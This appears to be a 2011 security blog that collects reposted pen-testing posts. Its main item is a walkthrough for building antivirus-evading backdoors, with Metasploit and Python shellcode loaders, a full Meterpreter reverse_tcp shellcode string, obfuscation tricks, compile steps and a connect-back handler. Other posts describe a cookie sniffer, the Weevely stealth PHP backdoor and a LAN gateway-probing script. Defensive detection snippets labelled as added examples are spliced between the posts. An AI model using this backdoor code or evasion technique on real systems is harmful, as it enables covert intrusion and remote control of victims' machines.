Oct 14, 2011

Create Backdoor With Evading Antivirus

If you want to see the full details, please go to the Source.

TIP #1: Do your reconnaissance. Know what antivirus software the target system personnel are running. While it is certainly possible to make a backdoor that evades all antivirus products, there is no need to waste those cycles if your target is only running one product, which is quite likely. Narrow down your options by getting this information from target system personnel by asking, by looking for information leakage such as e-mail footers that proclaim the AV product, or even with a friendly social engineering phone call if such interaction is allowed in your rules of engagement.

TIP #2: If you want to use your backdoor for more than one project, do not submit it to virustotal.com or any of the other online sandboxes/scanners that work with antivirus companies to generate new signatures. Instead, buy a copy of the antivirus product used by your target organization and test it on your own systems. Alternatively, if your target is using one of the nine AV products scanned by NoVirusThanks, you could use http://vscan.novirusthanks.org/ and be sure to select "Do not distribute the sample" at the bottom of the page.

TIP #3: KISS — Keep it simple, shell-boy. I'm a minimalist when it comes to remote access. I just need enough to get in, disable antivirus (if the rules of engagement will allow it), and then move in with more full-featured tools. This approach requires less coding on my part and there is less of a chance that I will incorporate something that antivirus doesn't like.

TIP #4: You don't have to COMPLETELY reinvent this wheel. Metasploit has templates in the data/templates/src directory for DLLs, EXEs, and Windows Services. Start with them and modify them only as required to avoid your target's defenses. For example:
$ cat data/templates/src/pe/exe/template.c

#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";   /* marker the framework looks for when it writes the shell code into the binary */

char comment[512] = "";
int main(int argc, char **argv) {
        (*(void (*)()) payload)();   /* treat the buffer as a function and call it */
        return(0);
}

You can set the payload[SCSIZE] array to any shell code that meets your needs and compile it. There are plenty of options out there for shell code. You can get several examples from exploit-db (http://www.exploit-db.com/shellcode/), and many of them do not trigger antivirus software. Or you can use msfpayload or msfvenom from Metasploit to generate C shell code and plug that into the template. For example:

$ ./msfpayload windows/shell_bind_tcp C

This generates C shell code that binds a shell to TCP port 4444. Compile it, and check whether the AV product running in your lab detects it. If the compiled program is detected, you have a lot of flexibility in the source code. You can try:

- Move part of your shell code to a different data segment

- Compile it to a different PE, old EXE, or COM (yes... I said .COM) format

- Break the shell code up into smaller strings and mix their order in the source code, then reassemble it into a variable in memory in the correct order before calling it

- Use timed events or wait() functions to delay the payload execution to avoid heuristic engines

- Create your own simple encoding engine to mask the bytes... it is easier than you think! Check out http://www.cprogramming.com/tutorial/xor.html

I like writing in Python, then using pyinstaller to create an exe out of my Python script. Here is a Python template I wrote that does the same thing as the C template provided with Metasploit:
from ctypes import *
shellcode = ''   # placeholder: fill with the shell code as a Python 2 byte string

# Copy the bytes into a ctypes buffer, then cast that buffer to a callable,
# which is the same trick the C template's (*(void (*)()) payload)() performs.
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

If you want to use a Metasploit payload as your shell code, you can easily turn the C source into a Python-compatible string by deleting all the double quotes and newlines with the handy tr command as follows:

$ ./msfpayload windows/shell_bind_tcp C | tr -d '"' | tr -d '\n'

If you generate a multi-stage payload, just grab the string for stage one. For example, to create a Metasploit framework reverse Meterpreter, I would do the following:

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= C | tr -d '"' | tr -d '\n' | more

Then grab the string produced for STAGE1 and plug it into my template as follows:

from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
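An added defender-side example (written for this page, not from the SANS post or Metasploit): a scanner for Python source that looks for the ctypes loader pattern of the template above together with long runs of \x escapes, so that the "smaller strings" variant from the list of tricks still adds up across chunks. The thresholds are assumptions of this example, and the sample scripts are constructed with counting filler bytes rather than any payload.

```python
import re

# Call names from the ctypes loader pattern in the post. Assumption of this
# example: a script using all three deserves a closer look, since ordinary
# ctypes code rarely casts a freshly created buffer to a CFUNCTYPE.
LOADER_CALLS = ("create_string_buffer", "CFUNCTYPE", "cast(")
# A run of 32 or more consecutive \xNN escapes inside one string literal.
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){32,}")
# Whole single-quoted literals made only of \xNN escapes, so the "break the
# shell code up into smaller strings" variant still adds up across chunks.
HEX_LITERAL = re.compile(r"'((?:\\x[0-9a-fA-F]{2})+)'")


def score_python_source(src: str) -> dict:
    """Return indicator counts for one Python source text plus a verdict."""
    loader_hits = [name for name in LOADER_CALLS if name in src]
    longest = max((len(m) // 4 for m in HEX_RUN.findall(src)), default=0)
    literals = HEX_LITERAL.findall(src)
    total = sum(len(lit) // 4 for lit in literals)
    verdict = len(loader_hits) == len(LOADER_CALLS) and (longest >= 32 or total >= 64)
    return {"loader_calls": loader_hits, "longest_run_bytes": longest,
            "hex_literals": len(literals), "escaped_bytes_total": total,
            "suspicious": verdict}


# Constructed samples; the byte strings are counting filler, not a payload.
BENIGN = 'from ctypes import *\nlibc = CDLL(None)\nbuf = create_string_buffer(b"hi", 16)\n'
FILLER = "".join(r"\x%02x" % (i % 256) for i in range(48))
LOADER = ("from ctypes import *\nshellcode = '" + FILLER + "'\n"
          "mem = create_string_buffer(shellcode, len(shellcode))\n"
          "fn = cast(mem, CFUNCTYPE(c_void_p))\n")
CHUNKED = ("from ctypes import *\n"
           + "".join("p%d = '%s'\n" % (i, "".join(r"\x%02x" % b for b in range(i, i + 20)))
                     for i in range(4))
           + "shellcode = p3 + p1 + p0 + p2\n"
           "mem = create_string_buffer(shellcode, len(shellcode))\n"
           "fn = cast(mem, CFUNCTYPE(c_void_p))\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("loader", LOADER), ("chunked", CHUNKED)):
        print(name, score_python_source(sample))
```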

Next, I'll compile my new backdoor with pyinstaller with the following options:

$ python configure.py
$ python makespec.py --onefile --noconsole shell_template.py
$ python build.py shell_template\shell_template.spec

To use the new payload, we set up the Metasploit framework with the multi/handler "exploit". Once our program is run on the target, it connects back to the framework, where stage 2 is delivered.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST LHOST =>
msf exploit(handler) > exploit

Source: http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing


If you like my blog, Please Donate Me

Oct 10, 2011

WebCookiesSniffer - New cookies sniffer/viewer utility

WebCookiesSniffer is a new packet sniffer utility that captures all web site cookies sent between the web browser and the web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the web site/host name that sent or received this cookie. When you select a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies in name-value format in the lower pane.

Except for the capture driver needed to capture network packets, WebCookiesSniffer doesn't require any installation process or additional DLL files. To start using it, simply run the executable file, WebCookiesSniffer.exe.

After running WebCookiesSniffer for the first time, the 'Capture Options' window appears on the screen, and you're asked to choose the capture method and the desired network adapter. The next time you use WebCookiesSniffer, it'll automatically start capturing packets with the capture method and network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9. After choosing the capture method and network adapter, WebCookiesSniffer captures and displays every cookie found in the data sent between your web browser and the remote web server.
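An added example, not part of the original post or of the NirSoft tool: the defender's view of what the sniffer displays. It parses a request Cookie string into name/value pairs the way the lower pane does, then lists the cookies a site set without the Secure flag, because those will also travel over plain HTTP where a sniffer like this one can read them; the headers are constructed sample data.

```python
from http.cookies import SimpleCookie

# Constructed response headers (sample data, not captured from a real site).
RESPONSE_HEADERS = """HTTP/1.1 200 OK
Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly
Set-Cookie: prefs=lang%3Den; Path=/; Secure; HttpOnly
Set-Cookie: tracking=xyz; Path=/
Content-Type: text/html
"""
# Constructed request Cookie header, as the browser would send it back.
REQUEST_COOKIE_HEADER = "SESSIONID=abc123; prefs=lang%3Den; tracking=xyz"


def parse_cookie_string(cookie_header: str) -> dict:
    """Split a request 'Cookie:' string into name/value pairs (the lower-pane view)."""
    pairs = {}
    for part in cookie_header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            pairs[name.strip()] = value.strip()
    return pairs


def parse_set_cookies(raw_headers: str) -> list:
    """Return (name, value, secure, httponly) for every Set-Cookie header."""
    found = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        jar = SimpleCookie()
        jar.load(line.split(":", 1)[1].strip())
        for name, morsel in jar.items():
            found.append((name, morsel.value,
                          bool(morsel["secure"]), bool(morsel["httponly"])))
    return found


def wire_exposed_cookies(raw_headers: str) -> list:
    """Cookies set without Secure: the browser will also send them over plain
    HTTP, which is exactly where a passive sniffer on the path can read them."""
    return [name for name, _, secure, _ in parse_set_cookies(raw_headers) if not secure]


if __name__ == "__main__":
    print(parse_cookie_string(REQUEST_COOKIE_HEADER))
    print("readable on the wire over HTTP:", wire_exposed_cookies(RESPONSE_HEADERS))
```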

Source: http://thehackernews.com/2011/10/webcookiessniffer-new-cookies.html


MSFConsole Prompt Fiddling

Metasploit has multiple ways of creating logs:

  • cat ~/.msf4/logs/framework.log
    This log automatically records all of the error data, which is great for troubleshooting when something isn't working, but it doesn't record what you are doing inside of msfconsole.

  • msf> spool ~/myclient.log
    The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe about this one is that it doesn't log the actual command you issued.

  • msf> set ConsoleLogging true
    msf> set LogLevel 5
    msf> set SessionLogging true
    msf> set TimestampOutput true
    These combined essentially do the same thing as spool, except that they go into different logs but do actually log the command you issued.

Plenty of logging, right? But none of them really 'log everything', and time stamps are not a regular occurrence in them. Cool, but we need both. We've got the 'log everything' part with the Linux 'script' command; we just need a way to inject time stamps into our log.

Enter the ever mutable 'msf>' prompt:

A lesser known variable in MSFConsole is 'PROMPT'. You can set it pretty much like a shell prompt in any other OS; however, there are some Metasploit-specific things you can add. Using a three-letter abbreviation you can even add color to it.

For example, let's add our hostname to our prompt:

  • set PROMPT %H
    changes msf> to myattackmachine>

And you can combine and add things that you wish:

  • set PROMPT %H Just more text %U
    changes the prompt to: myattackmachine Just more text mubix> (%U is the username)
For reference here are the other working % variables that I know of:

  • %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
  • %H = Host name (again, would be cool if this changed when in meterpreter)
  • %J = Current number of jobs running
  • %L = Local IP (makes it easy to remember what to put in LHOST)
  • %S = Current number of sessions open
  • %T = Time stamp
  • %U = Username (yes, would be awesome if this changed in meterpreter too)
Now if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You'll have to play around with the color names, as I don't know them all: %red, %blu, %blk, etc.
Combine all of that with script and you've got something awesome. I set my PROMPT to:

  • set PROMPT %T S:%S J:%J
  • 1970-01-01 00:00:00 +0000 S:0 J:0>

Source: http://www.room362.com/blog/2011/10/9/msfconsole-prompt-fiddling.html


Weevely: create and manage a PHP trojan designed to be hard to detect

This software is a proof of concept of an unobtrusive PHP backdoor that simulates a complete telnet-like connection, hides data in HTTP referers, and uses a dynamic probe of system-like functions to bypass PHP security restrictions.


root@bt:/weevely# ./main.py  -h
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/
Usage: main.py [options]
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the give
                        file, in the form 'label,url,password' where label is
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .
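An added example (not weevely's own code or format): a log-side check built on the one trait the post states, data carried in HTTP referers. It assumes, as a heuristic of this example, that carried data shows up as a long, high-entropy Referer path on requests to a .php file; the log lines are constructed.

```python
import math
import re
import string
from collections import Counter

# Apache/nginx combined log format (the lines below are constructed, not real traffic).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def shannon_entropy(text: str) -> float:
    """Bits per character; ordinary page URLs sit well below random-looking data."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def suspicious_referers(lines, min_len=40, min_entropy=5.0):
    """Flag requests to .php files whose Referer path looks like carried data.
    Heuristic assumed by this example: once scheme and host are stripped, a
    Referer that is both long and high-entropy is not a normal page link."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m.group("path").endswith(".php"):
            continue
        tail = re.sub(r"^https?://[^/]+", "", m.group("referer"))
        if len(tail) >= min_len:
            ent = shannon_entropy(tail)
            if ent >= min_entropy:
                flagged.append((m.group("ip"), m.group("path"), round(ent, 2)))
    return flagged


# Constructed sample: a plain link, a search-engine referer, and one carrying an opaque blob.
BLOB = string.ascii_letters + string.digits + "+/"
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Oct/2011:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 '
    '"http://www.example.com/" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Oct/2011:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 512 '
    '"http://www.google.com/search?q=web+cookies+sniffer&ie=utf-8&oe=utf-8&aq=t" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Oct/2011:10:00:03 +0000] "GET /images/logo.php HTTP/1.1" 200 64 '
    '"http://www.example.com/' + BLOB + '" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_referers(SAMPLE_LOG):
        print(hit)
```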

Source: https://code.google.com/p/weevely/


Gateway-finder [ Scapy script to find gateway IPs on the LAN ]

Gateway-finder is a Scapy script that will help you determine which of the systems on the local LAN have IP forwarding enabled and which can reach the Internet.

This can be useful during internal pentests when you want to quickly check for unauthorised routes to the Internet (e.g. rogue wireless access points) or routes to other internal LANs. It doesn't perform a hugely thorough check, but it is quick at least. It's Python, so it should be easy to modify to fit your needs.

[ Overview ]

You give the script the IP address of a system on the Internet you're trying to reach and it will send the following probes via each system on the local LAN:

* An ICMP Ping
* A TCP SYN packet to port 80
* An ICMP Ping with a TTL of 1
* A TCP SYN packet to port 80 with a TTL of 1

It will report separately which systems send an ICMP "TTL exceeded in transit" message back (indicating that they're routers) and which respond to the probe (indicating that they're gateways to the Internet).

[ Dependencies ]

Python and Scapy.  On Debian / Ubuntu you should just need to do this:

# apt-get install python-scapy

[ Usage ]

# python gateway-finder.py -h
WARNING: No route found for IPv6 destination :: (no default route?)
Usage: gateway-finder.py [ -I interface ] -i ip -f macs.txt

Tries to find a layer-3 gateway to the Internet.  Attempts to reach an IP
address using ICMP ping and TCP SYN to port 80 via each potential gateway
in macs.txt (ARP scan to find MACs)

  -h, --help            show this help message and exit
  -i IP, --ip=IP        Internet IP to probe
  -v, --verbose         Verbose output
                        Network interface to use
  -f MACFILE, --macfil=MACFILE
                        File containing MAC addresses

[ Step 1: Run an ARP scan to identify systems on the local LAN ]

Use your favourite ARP scanner to identify systems on the local LAN. Save the output (I save it to arp.txt in the example below).

# arp-scan -l | tee arp.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
00:13:72:09:ad:76       Dell Inc.
00:90:27:43:c0:57       INTEL CORPORATION
00:08:74:c0:40:ce       Dell Computer Corp.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 256 hosts scanned in 2.099 seconds (121.96 hosts/sec).  3 responded

[ Step 2: Run gateway-finder on the list of local systems ]

Gateway-finder needs two bits of input from you:
* The MAC addresses of the potential gateways
* The IP address of a system on the Internet (I use a google.com address in the example below):

If arp.txt also contains the IP of each system on the same line as the MAC, you'll get much nicer output. If you need to use a different network interface, use the -I option.

# python gateway-finder.py -f arp.txt -i
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder

[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in arp.txt
[+] 00:13:72:09:AD:76 [] appears to route ICMP Ping packets to  Received ICMP TTL Exceeded in transit response.
[+] 00:13:72:09:AD:76 [] appears to route TCP packets  Received ICMP TTL Exceeded in transit response.
[+] We can ping via 00:13:72:09:AD:76 []
[+] We can reach TCP port 80 on via 00:13:72:09:AD:76 []
[+] Done

Source: https://github.com/pentestmonkey/gateway-finder
